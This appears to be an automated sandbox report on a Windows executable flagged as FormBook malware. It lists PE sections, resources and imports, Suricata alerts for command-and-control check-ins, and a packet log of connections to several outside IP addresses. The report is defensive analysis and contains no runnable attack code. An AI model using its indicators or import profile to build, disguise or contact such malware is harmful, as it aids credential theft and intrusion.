IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x5ca58	0x5cc00	72eb5ba23a69100001907ceaa831ac95	False	0.9286477636455526	data	7.897038869891541	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x125000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x53d1d	data			1.000323308818175
RT_GROUP_ICON	0x1244d8	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x124550	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x124564	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x124578	0x14	data	English	Great Britain	1.25
RT_VERSION	0x12458c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x124668	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T08:23:35.385717+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49732	154.215.72.110	80	TCP
2024-12-24T08:24:09.428113+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49812	116.50.37.244	80	TCP
2024-12-24T08:25:32.858936+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49867	85.159.66.93	80	TCP
2024-12-24T08:25:47.642095+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49990	91.195.240.94	80	TCP
2024-12-24T08:26:11.200375+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49994	66.29.149.46	80	TCP
2024-12-24T08:26:26.330372+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	49998	195.110.124.133	80	TCP
2024-12-24T08:26:57.688067+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.5	50002	217.196.55.202	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:23:32.944736958 CET	49732	80	192.168.2.5	154.215.72.110
Dec 24, 2024 08:23:33.856511116 CET	80	49732	154.215.72.110	192.168.2.5
Dec 24, 2024 08:23:33.856648922 CET	49732	80	192.168.2.5	154.215.72.110
Dec 24, 2024 08:23:33.859038115 CET	49732	80	192.168.2.5	154.215.72.110
Dec 24, 2024 08:23:33.979686975 CET	80	49732	154.215.72.110	192.168.2.5
Dec 24, 2024 08:23:35.385493040 CET	80	49732	154.215.72.110	192.168.2.5
Dec 24, 2024 08:23:35.385643959 CET	80	49732	154.215.72.110	192.168.2.5
Dec 24, 2024 08:23:35.385716915 CET	49732	80	192.168.2.5	154.215.72.110
Dec 24, 2024 08:23:35.388562918 CET	49732	80	192.168.2.5	154.215.72.110
Dec 24, 2024 08:23:35.508171082 CET	80	49732	154.215.72.110	192.168.2.5
Dec 24, 2024 08:23:59.661310911 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:23:59.780991077 CET	80	49788	116.50.37.244	192.168.2.5
Dec 24, 2024 08:23:59.781112909 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:23:59.782883883 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:23:59.902424097 CET	80	49788	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:01.284461021 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:01.294707060 CET	80	49788	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:01.294770956 CET	80	49788	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:01.294812918 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:01.294856071 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:01.404284000 CET	80	49788	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:01.404536009 CET	49788	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:02.302114010 CET	49800	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:02.421710968 CET	80	49800	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:02.421883106 CET	49800	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:02.423640013 CET	49800	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:02.543158054 CET	80	49800	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:03.927052975 CET	80	49800	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:03.927161932 CET	80	49800	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:03.927292109 CET	49800	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:03.941293955 CET	49800	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:04.959400892 CET	49806	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:05.079049110 CET	80	49806	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:05.079319954 CET	49806	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:05.081207037 CET	49806	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:05.200817108 CET	80	49806	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:05.200877905 CET	80	49806	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:06.596338987 CET	49806	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:06.716358900 CET	80	49806	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:06.716434956 CET	49806	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:07.615107059 CET	49812	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:07.734699011 CET	80	49812	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:07.734797955 CET	49812	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:07.736605883 CET	49812	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:07.857009888 CET	80	49812	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:09.427828074 CET	80	49812	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:09.428049088 CET	80	49812	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:09.428112984 CET	49812	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:09.430555105 CET	49812	80	192.168.2.5	116.50.37.244
Dec 24, 2024 08:24:09.549994946 CET	80	49812	116.50.37.244	192.168.2.5
Dec 24, 2024 08:24:23.444900036 CET	49848	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:23.564519882 CET	80	49848	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:23.564760923 CET	49848	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:23.566631079 CET	49848	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:23.686170101 CET	80	49848	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:25.080759048 CET	49848	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:25.200916052 CET	80	49848	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:25.200998068 CET	49848	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:26.099641085 CET	49854	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:26.219470978 CET	80	49854	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:26.219584942 CET	49854	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:26.222455978 CET	49854	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:26.342029095 CET	80	49854	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:27.736975908 CET	49854	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:27.856803894 CET	80	49854	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:27.856889963 CET	49854	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:28.755628109 CET	49860	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:28.875075102 CET	80	49860	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:28.875164986 CET	49860	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:28.877325058 CET	49860	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:28.996831894 CET	80	49860	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:28.996989012 CET	80	49860	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:30.393192053 CET	49860	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:30.513108015 CET	80	49860	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:30.513173103 CET	49860	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:31.412029028 CET	49867	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:31.531500101 CET	80	49867	85.159.66.93	192.168.2.5
Dec 24, 2024 08:24:31.531593084 CET	49867	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:31.533456087 CET	49867	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:24:31.652976990 CET	80	49867	85.159.66.93	192.168.2.5
Dec 24, 2024 08:25:32.858721018 CET	80	49867	85.159.66.93	192.168.2.5
Dec 24, 2024 08:25:32.858823061 CET	80	49867	85.159.66.93	192.168.2.5
Dec 24, 2024 08:25:32.858936071 CET	49867	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:25:32.861774921 CET	49867	80	192.168.2.5	85.159.66.93
Dec 24, 2024 08:25:33.015057087 CET	80	49867	85.159.66.93	192.168.2.5
Dec 24, 2024 08:25:38.233604908 CET	49987	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:38.353245020 CET	80	49987	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:38.355437040 CET	49987	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:38.355437040 CET	49987	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:38.475034952 CET	80	49987	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:39.636188030 CET	80	49987	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:39.637763977 CET	80	49987	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:39.638041973 CET	49987	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:39.865513086 CET	49987	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:40.881632090 CET	49988	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:41.001326084 CET	80	49988	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:41.001466990 CET	49988	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:41.005633116 CET	49988	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:41.125284910 CET	80	49988	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:42.313630104 CET	80	49988	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:42.313649893 CET	80	49988	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:42.313746929 CET	49988	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:42.543349028 CET	49988	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:43.553455114 CET	49989	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:43.672972918 CET	80	49989	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:43.673079967 CET	49989	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:43.675380945 CET	49989	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:43.794864893 CET	80	49989	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:43.795634031 CET	80	49989	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:44.950000048 CET	80	49989	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:44.950145960 CET	80	49989	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:44.950242996 CET	49989	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:45.201900959 CET	49989	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:46.217619896 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:46.337210894 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:46.337327003 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:46.341620922 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:46.461071014 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.641958952 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.641988993 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642004967 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642095089 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.642147064 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642163992 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642180920 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642187119 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.642199993 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642216921 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642227888 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.642251015 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.642435074 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642451048 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.642487049 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.761827946 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.762029886 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.762111902 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.834112883 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.834542990 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.834636927 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.838313103 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.838447094 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.838521957 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.846811056 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.846880913 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.846950054 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.958911896 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.958933115 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.959038973 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.966255903 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:25:47.966341972 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:47.969217062 CET	49990	80	192.168.2.5	91.195.240.94
Dec 24, 2024 08:25:48.198087931 CET	80	49990	91.195.240.94	192.168.2.5
Dec 24, 2024 08:26:01.890834093 CET	49991	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:02.010350943 CET	80	49991	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:02.010452986 CET	49991	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:02.012259007 CET	49991	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:02.131942987 CET	80	49991	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:03.241569996 CET	80	49991	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:03.241828918 CET	80	49991	66.29.149.46	192.168.2.5
Dec 24, 2024 08:26:03.241889954 CET	49991	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:03.518296003 CET	49991	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:04.541717052 CET	49992	80	192.168.2.5	66.29.149.46
Dec 24, 2024 08:26:04.666054964 CET	80	49992	66.29.149.46	192.168.2.5
